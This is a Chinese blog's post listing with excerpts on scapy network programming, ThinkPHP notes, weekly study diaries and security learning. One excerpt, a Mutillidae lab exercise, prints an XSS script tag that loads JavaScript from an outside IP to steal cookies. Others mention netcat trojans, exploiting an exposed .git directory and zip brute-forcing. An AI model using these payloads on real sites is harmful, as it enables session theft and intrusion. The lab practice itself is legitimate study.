- 博客(25)
- 收藏
- 关注
RSS订阅原创 python网络编程——路径MTU发现
思路:手动构造一个指定大小的数据包,在IP首部设置强制不分片,根据返回的ICMP差错报文类型来判断数据包大小是否超过MTU如果返回数据包ICMP层的type==3,code==4则表明数据包已经超过了MTU如果返回数据包ICMP层的type==0,code==0则表明数据包可以成功发送,大小没有超过MTU在主函数中设置一个循环递减设置的数据包大小来探测MTU值代码:i...
2020-02-20 23:53:58
2057
1
原创 python网络编程——IP分片
思路:手动构造ICMP数据包,设置IP的flags和frag进行分片,通过id标识为同一个数据包代码:import sysimport logginglogging.getLogger("scapy.runtime").setLevel(logging.ERROR)#清除报错from scapy.all import *send(IP(flags=1,frag=0,id=...
2020-02-20 23:30:08
1555
原创 python网络编程——实现路由记录
首先查看路由记录如何运行的,那么先用GNS3搭建一个简易网络环境:设置好动态路由解析后开始查看:抓包分析:最大记录九个,其中第一个是自己的IP发送:接收:OK开始用python写路由记录功能:思路:众所周知ping是基于ICMP协议的1.发送ICMP数据包,在IP报头option中添加自己的IP,空出八个空位等待存放其他IP2.设置ICMP报文的ty...
2020-02-20 22:26:57
1577
原创 python网络编程——实现ARP协议
主要思路:1.通过python psutil模块,并对网卡名称进行筛选得到对应网卡的IP地址和MAC地址2.使用scapy库中的srp()函数发送二层数据包并获得返回值3.使用type()函数分析返回值类型,查询对应的类中的方法,来提取关键信息发送包的属性可以在scapy中查询,如:查询本机对应网卡,IP,MAC 代码:import psutildef get_lo...
2020-02-20 21:28:16
2833
原创 thinkphp:模板
变量输出自定义变量输出:{$value}默认值输出:{$value|default='默认值'}系统变量:($Think.server/env/post/get/cookie/session/request)使用运算符需要注意:数学运算,.语法失效模板解析定界符(TMPL_L_DELIM、TMPL_R_DELIM)使用函数变量是第一个参数:{$vaule|f...
2019-03-31 12:30:51
866
原创 ThinkPHP:URL模式
thinkPHP有四种URL模式,通过URL_MODEL配置:0:普通模式(http://domain/index.php?m=m&c=c&a=a)1:PathInfo(http://domain/index.php/m/c/a)2:ReWrite(http://domain/m/c/a)3:兼容模式1,2需要运行环境的支持使用U函数可以动态生成...
2019-03-31 12:18:54
1066
原创 ThinkPHP:获取输入变量
获取输入变量的几种方式:$_GET/$_POST/$_SERVER ThinkPHP框架提供了I函数,方便的实现了输入变量的读取,并自动进行数据安全过滤 Input函数:I('变量类型.变量名',['默认值'],['过滤方法'],['额外数据源'])...
2019-03-31 12:18:44
1163
原创 think PHP视图
一、视图基本结构:默认视图层:(DEFAULT_V_LAYER) 模板文件后缀:(TMPL_TEMPLATE_SUFFIX) 连接符:(TMPL_FIEL_DEPR) 视图目录:(VIEW_PATH)二、视图变量赋值和渲染使用控制器的assign方法为视图变量赋值:assign('name',$value) 渲染视图:控制器display()方法,;fetch和show方法...
2019-03-31 12:18:29
835
原创 ThinkPHP:跳转与Ajax数据返回
Think PHP控制器提供了以下几种方式实现页面跳转和响应redirect重定向 success成功提示跳转 error错误提示跳转 ajaxReturn实现Ajax数据返回控制器定义了六个常量,用来快速判断请求的类型,分别是IS_SET,IS_POST,IS_PUT,IS_DELETE,IS_AJAX,REQUEST_METHOD如果不是jQuery,提交Ajax请...
2019-03-31 12:18:04
1115
原创 渗透测试基本工具:netcat——nc
NETCAT功能总结:nc可以完成所有Telnet可以完成的工作 传输文本信息 传输文件/目录 加密传输文件 远程控制/木马 加密所有流量 流媒体服务器 远程克隆硬盘具体操作:NC——TELNETnc -vn [ip] [port]nc通信,取证:用kali2号监听4399端口用kali1号连接2号的4399端口:一号机简单取证发送给2号:...
2018-10-15 13:33:05
3117
1
原创 mutillidae平台:XSS Payload 之cookie窃取练习
此次练习主要是用mutillidae靶场实现了《白帽子讲web安全》上的xss payload 窃取用户cookie实例。需要创建两个用户进行测试:墨中白,test用账号墨中白进入xss blog练习页面:在文本框中插入代码<script type="text/javascript" src="http://47.116.10.120/wxx.js"></s...
2018-09-26 01:01:58
2103
2
原创 python实现:压缩文件爆破,社工字典生成小工具
其实我学python的本心是用来开发工具的,有一个python实现的whois域名查询工具,过于简单就不写博客了,其实就是一个简单爬虫就能实现的功能。最近闲来无事发现工作室的招新试卷压缩包是经过加密的,以前爆破都是直接下载工具下载字典爆破的。终于可以自己写一个工具了哈哈。于是就开始写压缩文件爆破工具和社工字典生成工具。下面简单介绍下原理:压缩文件爆破工具:其实原理很简单,...
2018-09-24 21:06:43
2136
原创 利用.Git对服务器进行的一次渗透
此次渗透起源于我写了一个python的聊天脚本,tcp通信可以挂在外网上,但是udp通信接收不到消息,于是我想弄一台内网服务器运行我的服务端脚本转发消息。 使用AWVS对改服务器进行扫描:发现.git漏洞在GitHub上下载githack软件https://github.com/lijiejie/GitHack利用这个软件可以复原工程源码,再分析源码寻...
2018-09-18 22:03:53
1797
原创 Linux运维-权限详解
一、用户和组配置文件详解:/etc/passwd /etc/shadow 密码相关策略文件 Linux中用户分为三类:超级用户 root 系统用户 第三方程序使用某些功能产生的用户,不能登录(可在/etc/passwd 中查看其shell为sbin/nologin),一般系统会为其分配ID范围,可在/etc/login.defs中查看范围 普通用户 ...
2018-09-10 16:33:31
1765
2
原创 我的web渗透学习心得(一)
好久没写博客了,上次写博客还是在上学期.而且以前写博客都是写写一周做了些什么.这次分享一些自己学web渗透的一些心得吧(仅作个人心得,谨慎参照,有大佬路过还望指点一下~).此前一直在学Java web.这次趁着五一假期好好钻研了下web渗透.其实我一直觉得每个学计算机的人都有黑客梦,炫酷吊炸天啊......其实很早我就想学web安全.上学期在工作室学了一个学期的前端打了下基础.看了...
2018-05-01 14:11:12
11369
1
原创 第十周周总结
本周主要用bootstrap框架写了一个网页.没学什么新东西,本来想在网页上实现一个回到顶部的按钮功能由于元旦回家加上各种科目的复习以及情绪上的问题,没能实现,总的来说还是很匆忙的一周,由于周任务没写完在家也写了好久-_-...周一匆匆忙忙赶到工作室开会,大家都为我推迟了会议时间,我还是迟到了,很愧疚..元旦回家虽然没做什么,但还是解决了一些感情上的问题.转眼一学期就过去了啊,虽然不尽如人意,还是
2018-01-03 12:31:39
823
原创 第九周周总结
本周主要学了bootstrap框架,感觉在bootstrap下写网页要方便很多也要麻烦很多,话语有些矛盾/笑哭.方便的话主要是写出来可以不用再去纠结响应式布局,麻烦的话当然就是class名称太多了,根本记不过来.很多实例跟着视频敲了一遍还是记不住,JavaScript部分更是难以理解,头大.再就是用了框架之后不太好改样式,总觉得改了之后会影响框架中的响应式布局.感觉需要大量的练习才能很熟练的掌握b
2017-12-26 10:42:37
852
原创 第八周周总结
本周写了一个很简单的HTML5画布游戏,由于事情很多,做周任务的时间比较有限.没有加入理想中的人物跑动效果.感觉学JavaScript时间还是太短,毕竟再怎么说也是一门语言,掌握的很粗浅,特别是学完面向对象语言c++和java后感觉JavaScript中的定义对象很模糊.以后还是要找几本书研究研究.不管怎么说,这学期最黑暗的一周总算是过去了.下周开始学bootstrap框架.关于寒假任务的话,原本
2017-12-18 19:24:20
867
原创 第七周周总结
本周在极客学院上学完了JavaScript,以及HTML5的画布.发现并不能很好的把JavaScript应用到HTML中.JavaScript中事件也比较多,很容易忘记,关于写一个网页游戏总体上也有了一个思路.就是实现一个简单的抓怪兽游戏吧,然后用给角色加上一个帧动画效果,实现上下左右跑动的时候动作会变化.时间不是特别够,还要复习大学物理,比较的仓促......下周任务:制作HTML5网页
2017-12-12 21:54:46
947
原创 第六周周总结
本周主要在复习概统,因为周任务也比较简单,所以开始的很晚.主要学习了响应式网页的制作,给上周的动态网页加上了一个响应式.作品主要亮点还是在于导航栏,实现了一个三重幻影效果,虽然没有原网页实现的那么完美,但基本原理是实现了,还是比较开心.缺陷的话就是导航栏缩小之后就消失了没有实现一个侧边导航栏的效果,以及一个收纳效果.下周任务:学习HTML5 和 js复习大学物理复习英语四级
2017-12-04 10:36:57
902
原创 第五周周总结
本周主要学习了css3 制作了一个简单的动态网页,感觉对css3的很多属性还不是特别了解,对网页的布局还存在问题.经过这周的学习我深知视频学习的快速.但感觉只看视频的话理解是不够深入的.各种基本属性还是要自己去看才能印象更深,然后通过视频去学习别人的代码格式,自己写代码的时候思路才会更加清晰. 其他方面的话感觉很乱,c++实验原本准备答辩的,人太多了又没答成,数据库感觉有点麻烦,又是交代码又是画
2017-11-27 10:21:02
818
原创 第四周周总结
第四周周总结 本周没有布置周任务,主要重新在w3school上复习了一遍html和css。因为月考核还有算法,在三峡大学oj上刷了一些题,练了一下手感。复习了一下数据结构。做了一遍以前的月考核试卷,感觉还行。各种实验和晚课,导致去工作室次数相比以前比较少。不知不觉进工作室一个月了,这一个月里学了很多知识,更多的是对学习的一种态度吧。我个人自制力是比较差的,进工作室以前比较懒散。进了
2017-11-18 11:56:23
1053
原创 第三周周总结
本周按照图片写网页,在编写过程中穿插用了很多浮动绝对定位和相对定位,感觉自己对整个网页的定位和布局有了更深入的掌握.在网页细节方面感觉还是不够细心,过程中犯了很多细节上的错误.例如块之间的间距忘加,保存时文章中莫名其妙多了很多s等等.由于周任务网页写的比较快,所以花了很多时间来学c++,经常跟着视频敲一下案例,感觉掌握的还行.进入工作室三周了,感觉挺好......下周计划完成周任务c+
2017-11-13 12:07:10
872
原创 第二周周总结
本周周总结:1.本周没怎么学新的内容,简单看了一下css3,发现有很多需要用到javascript的知识。2.主要是做了一个IRIDIUM网页,巩固了一下定位和布局,感觉因为响应式布局没学兼容性有些问题心得:整个网页实现左右分区以及导航栏的横向排布都是用的float,感觉自己对绝对定位和相对定位还是不熟悉,下周的网页要尝试着用绝对定位写一写。html中的很多标签,css中的很多方法还不
2017-11-06 08:37:56
911
原创 第一周周总结
本周周总结:1.本周主要学完了HTML和CSS2.做了一个百度首页.3.算法的话做到了第二周的4.由于课内开了java这门课,所以java的学习也开了一个头.心得:因为我HTML是看慕课网上的知识点学完的,在运用实践的时候感觉学到的标签相较于w3c不是特别全面.然后很多标签虽然看过了一遍懂了原理,还是很容易忘记.然后,因为我是刚学完CSS立马就开始做百度首页了,所以代码排的很乱
2017-10-29 13:18:25
1133
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人